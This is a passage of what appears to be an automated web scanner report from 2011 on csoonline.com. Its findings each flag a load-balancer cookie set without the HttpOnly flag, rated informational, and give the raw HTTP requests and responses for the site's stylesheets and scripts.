Cookie: __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __utmc=209317120; __utmb=209317120.1.10.1298897096; s_pers=%20s_pv%3DCSO%2520nCircle%2520Solution%2520Center%7C1298898968728%3B; s_sess=%20s_cc%3Dtrue%3B%20s_ppv%3D43%3B%20SC_LINKS%3DCSO%2520nCircle%2520Solution%2520Center%255E%255ETools%2520%2526%2520Templates%255E%255ECSO%2520nCircle%2520Solution%2520Center%2520%257C%2520Tools%2520%2526%2520Templates%255E%255ENav%253AMain%3B%20s_sq%3Dcsoonlinecom%253D%252526pid%25253DCSO%25252520nCircle%25252520Solution%25252520Center%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.csoonline.com/article/486324%252526ot%25253DA%3B; NSC_djp.dpn=44593ca03660

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 12:45:50 GMT
Server: Apache/1.3.37 (Unix) Resin/3.0.22
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Set-Cookie: NSC_djp.dpn=44593ca03660;expires=Mon, 28-Feb-11 13:01:31 GMT;path=/
Cache-Control: private
Content-Length: 68626

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...

6.3. http://www.csoonline.com/documents/flash/cso_partners_sm_3.swf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.csoonline.com
Path:   /documents/flash/cso_partners_sm_3.swf

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /documents/flash/cso_partners_sm_3.swf HTTP/1.1
Host: www.csoonline.com
Proxy-Connection: keep-alive
Referer: http://www.csoonline.com/article/486324/security-tools-templates-policies
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_pers=%20s_pv%3DArticle%253A486324%253ASecurity%2520Tools%252C%2520Templates%252C%2520Policies%7C1298898971263%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_ppv%3D0%3B%20s_sq%3D%3B; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __utmc=209317120; __utmb=209317120.2.10.1298897096; MetrixLabp10833_master=1; __switchTo5x=4; __unam=db592fa-12e6c4e2ed5-37f53805-1; NSC_djp.dpn=44593ca03660

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 12:46:22 GMT
Server: Apache/1.3.37 (Unix) Resin/3.0.22
Last-Modified: Tue, 31 Mar 2009 21:04:18 GMT
ETag: "dcbd8-4b26-49d28552"
Accept-Ranges: bytes
Content-Length: 19238
Content-Type: application/x-shockwave-flash
Set-Cookie: NSC_djp.dpn=44593ca03660;expires=Mon, 28-Feb-11 13:02:03 GMT;path=/

CWS..Q..x...sp.M..wl........m..L..m..m[.{.;.....y....U.......[..w...o....0.@...&9..............    ...>.V..,.#6..
..........*.q.....
)...
..3....2...(.~w....LHF.e.J.J... .Ml...YxY.|. xp>Gx.<..t.r.j....x.
...[SNIP]...

6.4. http://www.csoonline.com/elqNow/elqOPG.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.csoonline.com
Path:   /elqNow/elqOPG.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /elqNow/elqOPG.js?20101216 HTTP/1.1
Host: www.csoonline.com
Proxy-Connection: keep-alive
Referer: http://www.csoonline.com/article/486324/security-tools-templates-policies
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_pers=%20s_pv%3DArticle%253A486324%253ASecurity%2520Tools%252C%2520Templates%252C%2520Policies%7C1298898971263%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_ppv%3D0%3B%20s_sq%3D%3B; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __utmc=209317120; __utmb=209317120.2.10.1298897096; MetrixLabp10833_master=1; NSC_djp.dpn=44593ca03660

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 12:46:06 GMT
Server: Apache/1.3.37 (Unix) Resin/3.0.22
Last-Modified: Thu, 16 Dec 2010 18:59:53 GMT
ETag: "dccc4-afc-4d0a61a9"
Accept-Ranges: bytes
Content-Length: 2812
Content-Type: application/x-javascript
Set-Cookie: NSC_djp.dpn=44593ca03660;expires=Mon, 28-Feb-11 13:01:47 GMT;path=/

OPG = window.OPG || {};
OPG.Eloqua = OPG.Eloqua || {};
OPG.Eloqua = function () {
   return {
    eloqua_iframe: "",
        eloqua_date: function() {
            var today=new Date();
           var dd=today.getDate()
...[SNIP]...

6.5. http://www.csoonline.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.csoonline.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: www.csoonline.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_pv%3DCSO%2520nCircle%2520Solution%2520Center%7C1298898896107%3B; __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __utmc=209317120; __utmb=209317120.1.10.1298897096; NSC_djp.dpn=44593ca03660; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D43%3B

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 12:44:46 GMT
Server: Apache/1.3.37 (Unix) Resin/3.0.22
Last-Modified: Fri, 28 Mar 2008 15:41:54 GMT
ETag: "dc43b-37e-47ed11c2"
Accept-Ranges: bytes
Content-Length: 894
Content-Type: image/x-icon
Set-Cookie: NSC_djp.dpn=44593ca03660;expires=Mon, 28-Feb-11 13:00:27 GMT;path=/

..............h.......(....... ................................U".U".U".U".U".U".U".U".U".U".U".U".U".U".U".U".U".U".U".U".U".U".U".U".U".U".U".U".U".U".U".U".U".U".U".U".U".U".U".U".U".U".U".U".U".U"
...[SNIP]...

6.6. http://www.csoonline.com/js/doubleclick_ads.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.csoonline.com
Path:   /js/doubleclick_ads.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/doubleclick_ads.js?20100223 HTTP/1.1
Host: www.csoonline.com
Proxy-Connection: keep-alive
Referer: http://www.csoonline.com/solution-centers/ncircle?item=5&tab=1&from=cso&src=csozne
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NSC_djp.dpn=44593ca03660

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 12:44:36 GMT
Server: Apache/1.3.37 (Unix) Resin/3.0.22
Last-Modified: Fri, 23 Apr 2010 02:04:23 GMT
ETag: "dc83a-75a-4bd10027"
Accept-Ranges: bytes
Content-Length: 1882
Content-Type: application/x-javascript
Set-Cookie: NSC_djp.dpn=44593ca03660;expires=Mon, 28-Feb-11 13:00:17 GMT;path=/

// random # for ads, client-side to avoid caching
var ord = Math.random()*10000000000000000;

// fill extraAdKeys as needed
// (check if exists b/c demandbase might try to create as well, if in wrong
...[SNIP]...

6.7. http://www.csoonline.com/js/sharing.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.csoonline.com
Path:   /js/sharing.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/sharing.js?20101220 HTTP/1.1
Host: www.csoonline.com
Proxy-Connection: keep-alive
Referer: http://www.csoonline.com/article/486324/security-tools-templates-policies
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_pers=%20s_pv%3DArticle%253A486324%253ASecurity%2520Tools%252C%2520Templates%252C%2520Policies%7C1298898971263%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_ppv%3D0%3B%20s_sq%3D%3B; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __utmc=209317120; __utmb=209317120.2.10.1298897096; MetrixLabp10833_master=1; NSC_djp.dpn=44593ca03660

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 12:46:05 GMT
Server: Apache/1.3.37 (Unix) Resin/3.0.22
Last-Modified: Mon, 20 Dec 2010 21:36:24 GMT
ETag: "dc840-7d1-4d0fcc58"
Accept-Ranges: bytes
Content-Length: 2001
Content-Type: application/x-javascript
Set-Cookie: NSC_djp.dpn=44593ca03660;expires=Mon, 28-Feb-11 13:01:46 GMT;path=/

jQuery(document).ready(function() {
                                   
   jQuery('#article_tools').css('top','50px');
   jQuery('#article_tools').show();    
   
   var iecatch = jQuery.browser.msie + jQuery.browser.version;

   var top =
...[SNIP]...

6.8. http://www.csoonline.com/module.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.csoonline.com
Path:   /module.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /module.htm?moduleType=article_comments&contentId=486324&taxonomyId=41193&leadTaxonomy=security&ajax=true&outputFormat=json HTTP/1.1
Host: www.csoonline.com
Proxy-Connection: keep-alive
Referer: http://www.csoonline.com/article/486324/security-tools-templates-policies
X-Prototype-Version: 1.5.1
X-Requested-With: XMLHttpRequest
Accept: text/javascript, text/html, application/xml, text/xml, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_pers=%20s_pv%3DArticle%253A486324%253ASecurity%2520Tools%252C%2520Templates%252C%2520Policies%7C1298898971263%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_ppv%3D0%3B%20s_sq%3D%3B; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __utmc=209317120; __utmb=209317120.2.10.1298897096; MetrixLabp10833_master=1; __switchTo5x=4; __unam=db592fa-12e6c4e2ed5-37f53805-1; NSC_djp.dpn=44593ca03660

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 12:46:18 GMT
Server: Apache/1.3.37 (Unix) Resin/3.0.22
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Set-Cookie: NSC_djp.dpn=44593ca03660;expires=Mon, 28-Feb-11 13:01:59 GMT;path=/
Cache-Control: private
Content-Length: 1683

{"comments":"<link href=\"http:\/\/comments.csoonline.com\/themes\/CIO.com\/style.css\" rel=\"stylesheet\" type=\"text\/css\" media=\"screen\" \/><a id=\"comment\"><\/a>\n<a id=\"comment-10368\"><\/
...[SNIP]...

6.9. http://www.csoonline.com/solution-centers/ncircle  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.csoonline.com
Path:   /solution-centers/ncircle

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /solution-centers/ncircle?item=5&tab=1&from=cso&src=csozne HTTP/1.1
Host: www.csoonline.com
Proxy-Connection: keep-alive
Referer: http://www.ncircle.com/index.php?s=solution_cso
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 12:44:31 GMT
Server: Apache/1.3.37 (Unix) Resin/3.0.22
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Set-Cookie: NSC_djp.dpn=44593cbe3660;expires=Mon, 28-Feb-11 13:00:11 GMT;path=/
Cache-Control: private
Content-Length: 27473

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...

6.10. http://www.csoonline.com/styles/article.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.csoonline.com
Path:   /styles/article.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /styles/article.css?09272010 HTTP/1.1
Host: www.csoonline.com
Proxy-Connection: keep-alive
Referer: http://www.csoonline.com/solution-centers/ncircle?item=5&tab=1&from=cso&src=csozne
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NSC_djp.dpn=44593ca03660

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 12:44:34 GMT
Server: Apache/1.3.37 (Unix) Resin/3.0.22
Last-Modified: Mon, 20 Dec 2010 21:40:44 GMT
ETag: "dc81a-4e65-4d0fcd5c"
Accept-Ranges: bytes
ntCoent-Length: 20069
Content-Type: text/css
Set-Cookie: NSC_djp.dpn=44593ca03660;expires=Mon, 28-Feb-11 13:00:15 GMT;path=/
Cache-Control: private
Content-Length: 20069

/*******************************************************
*Major article sections - positioning, margins, widths*
*******************************************************/
#article {
   clear:both;
}


...[SNIP]...

6.11. http://www.csoonline.com/styles/channel.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.csoonline.com
Path:   /styles/channel.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /styles/channel.css?11212010 HTTP/1.1
Host: www.csoonline.com
Proxy-Connection: keep-alive
Referer: http://www.csoonline.com/solution-centers/ncircle?item=5&tab=1&from=cso&src=csozne
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NSC_djp.dpn=44593ca03660

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 12:44:34 GMT
Server: Apache/1.3.37 (Unix) Resin/3.0.22
Last-Modified: Tue, 16 Nov 2010 22:42:32 GMT
ETag: "dc828-214f-4ce308d8"
Accept-Ranges: bytes
ntCoent-Length: 8527
Content-Type: text/css
Set-Cookie: NSC_djp.dpn=44593ca03660;expires=Mon, 28-Feb-11 13:00:15 GMT;path=/
Cache-Control: private
Content-Length: 8527

/*******************************************************
*Major channel sections - positioning, margins, widths*
*******************************************************/
#channel {
   clear:both;
}


...[SNIP]...

6.12. http://www.csoonline.com/styles/cso.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.csoonline.com
Path:   /styles/cso.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /styles/cso.css?12172010 HTTP/1.1
Host: www.csoonline.com
Proxy-Connection: keep-alive
Referer: http://www.csoonline.com/solution-centers/ncircle?item=5&tab=1&from=cso&src=csozne
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NSC_djp.dpn=44593ca03660

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 12:44:31 GMT
Server: Apache/1.3.37 (Unix) Resin/3.0.22
Last-Modified: Fri, 17 Dec 2010 16:04:52 GMT
ETag: "dc818-185-4d0b8a24"
Accept-Ranges: bytes
Cteonnt-Length: 389
Content-Type: text/css
Set-Cookie: NSC_djp.dpn=44593ca03660;expires=Mon, 28-Feb-11 13:00:13 GMT;path=/
Cache-Control: private
Content-Length: 389

/*    
   BEGIN hide from Mac IE5
\*/

@import url("reset.css");
@import url("global.css?10052010");
@import url("global_nav.css?12162010");
@import url("general.css?09282010");
@import url("modules.css?12
...[SNIP]...

6.13. http://www.csoonline.com/styles/general.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.csoonline.com
Path:   /styles/general.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /styles/general.css?09282010 HTTP/1.1
Host: www.csoonline.com
Proxy-Connection: keep-alive
Referer: http://www.csoonline.com/solution-centers/ncircle?item=5&tab=1&from=cso&src=csozne
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NSC_djp.dpn=44593ca03660

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 12:44:33 GMT
Server: Apache/1.3.37 (Unix) Resin/3.0.22
Last-Modified: Tue, 28 Sep 2010 15:48:01 GMT
ETag: "dc82b-5fcb-4ca20e31"
Accept-Ranges: bytes
ntCoent-Length: 24523
Content-Type: text/css
Set-Cookie: NSC_djp.dpn=44593ca03660;expires=Mon, 28-Feb-11 13:00:14 GMT;path=/
Cache-Control: private
Content-Length: 24523


/**********************************************************
Major index-page | detail-page sections
   - positioning, margins, widths
*********************************************************/
#
...[SNIP]...

6.14. http://www.csoonline.com/styles/global.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.csoonline.com
Path:   /styles/global.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /styles/global.css?10052010 HTTP/1.1
Host: www.csoonline.com
Proxy-Connection: keep-alive
Referer: http://www.csoonline.com/solution-centers/ncircle?item=5&tab=1&from=cso&src=csozne
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NSC_djp.dpn=44593ca03660

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 12:44:33 GMT
Server: Apache/1.3.37 (Unix) Resin/3.0.22
Last-Modified: Wed, 06 Oct 2010 19:16:28 GMT
ETag: "dc819-2dc2-4caccb0c"
Accept-Ranges: bytes
ntCoent-Length: 11714
Content-Type: text/css
Set-Cookie: NSC_djp.dpn=44593ca03660;expires=Mon, 28-Feb-11 13:00:14 GMT;path=/
Cache-Control: private
Content-Length: 11714

/********************
*Global type styles*
********************/
html {
   font-size: 100%;
}

body {
   background:#01203d url(/images/bg/bg_site.gif) repeat-x;
   color:#000;
   font:normal 16px "Lucida G
...[SNIP]...

6.15. http://www.csoonline.com/styles/global_nav.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.csoonline.com
Path:   /styles/global_nav.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /styles/global_nav.css?12162010 HTTP/1.1
Host: www.csoonline.com
Proxy-Connection: keep-alive
Referer: http://www.csoonline.com/solution-centers/ncircle?item=5&tab=1&from=cso&src=csozne
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NSC_djp.dpn=44593ca03660

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 12:44:33 GMT
Server: Apache/1.3.37 (Unix) Resin/3.0.22
Last-Modified: Thu, 16 Dec 2010 00:42:38 GMT
ETag: "dc81f-18fe-4d09607e"
Accept-Ranges: bytes
ntCoent-Length: 6398
Content-Type: text/css
Set-Cookie: NSC_djp.dpn=44593ca03660;expires=Mon, 28-Feb-11 13:00:14 GMT;path=/
Cache-Control: private
Content-Length: 6398

/************************************************************************
*Styles for the nav tabs - will be referenced later for various modules*
***************************************************
...[SNIP]...

6.16. http://www.csoonline.com/styles/homepage.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.csoonline.com
Path:   /styles/homepage.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /styles/homepage.css?12162010 HTTP/1.1
Host: www.csoonline.com
Proxy-Connection: keep-alive
Referer: http://www.csoonline.com/solution-centers/ncircle?item=5&tab=1&from=cso&src=csozne
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NSC_djp.dpn=44593ca03660

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 12:44:33 GMT
Server: Apache/1.3.37 (Unix) Resin/3.0.22
Last-Modified: Wed, 15 Dec 2010 23:30:12 GMT
ETag: "dc815-b4b-4d094f84"
Accept-Ranges: bytes
Cteonnt-Length: 2891
Content-Type: text/css
Set-Cookie: NSC_djp.dpn=44593ca03660;expires=Mon, 28-Feb-11 13:00:14 GMT;path=/
Cache-Control: private
Content-Length: 2891

/********************************************************
*Major homepage sections - positioning, margins, widths*
********************************************************/

#homepage {
   clear:both;
...[SNIP]...

6.17. http://www.csoonline.com/styles/insider.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.csoonline.com
Path:   /styles/insider.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /styles/insider.css?10252010 HTTP/1.1
Host: www.csoonline.com
Proxy-Connection: keep-alive
Referer: http://www.csoonline.com/solution-centers/ncircle?item=5&tab=1&from=cso&src=csozne
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NSC_djp.dpn=44593ca03660

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 12:44:34 GMT
Server: Apache/1.3.37 (Unix) Resin/3.0.22
Last-Modified: Fri, 22 Oct 2010 00:25:03 GMT
ETag: "dc820-1627-4cc0d9df"
Accept-Ranges: bytes
ntCoent-Length: 5671
Content-Type: text/css
Set-Cookie: NSC_djp.dpn=44593ca03660;expires=Mon, 28-Feb-11 13:00:15 GMT;path=/
Cache-Control: private
Content-Length: 5671

.clearfix {
   zoom:1; /* needed for IE... */    
}

.clearfix:after {
content: ".";
display: block;
height: 0;
clear: both;
visibility: hidden;
}

#insider_list_page {
   clear:both;    
   p
...[SNIP]...

6.18. http://www.csoonline.com/styles/modules.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.csoonline.com
Path:   /styles/modules.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /styles/modules.css?12172010 HTTP/1.1
Host: www.csoonline.com
Proxy-Connection: keep-alive
Referer: http://www.csoonline.com/solution-centers/ncircle?item=5&tab=1&from=cso&src=csozne
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NSC_djp.dpn=44593ca03660

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 12:44:33 GMT
Server: Apache/1.3.37 (Unix) Resin/3.0.22
Last-Modified: Wed, 22 Dec 2010 21:29:48 GMT
ETag: "dc81c-53d6-4d126dcc"
Accept-Ranges: bytes
ntCoent-Length: 21462
Content-Type: text/css
Set-Cookie: NSC_djp.dpn=44593ca03660;expires=Mon, 28-Feb-11 13:00:14 GMT;path=/
Cache-Control: private
Content-Length: 21462

/**********************
*Global module styles*
**********************/
.modules {
   margin-bottom: 20px;
   /*padding: 8px;*/
}

.moduleBody {
   border-bottom: 1px solid #c5c5c5;
   border-left: 1px solid
...[SNIP]...

6.19. http://www.csoonline.com/styles/solutions_center.css  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.csoonline.com
Path:   /styles/solutions_center.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /styles/solutions_center.css HTTP/1.1
Host: www.csoonline.com
Proxy-Connection: keep-alive
Referer: http://www.csoonline.com/solution-centers/ncircle?item=5&tab=1&from=cso&src=csozne
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NSC_djp.dpn=44593ca03660

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 12:44:35 GMT
Server: Apache/1.3.37 (Unix) Resin/3.0.22
Content-Type: text/html; charset=iso-8859-1
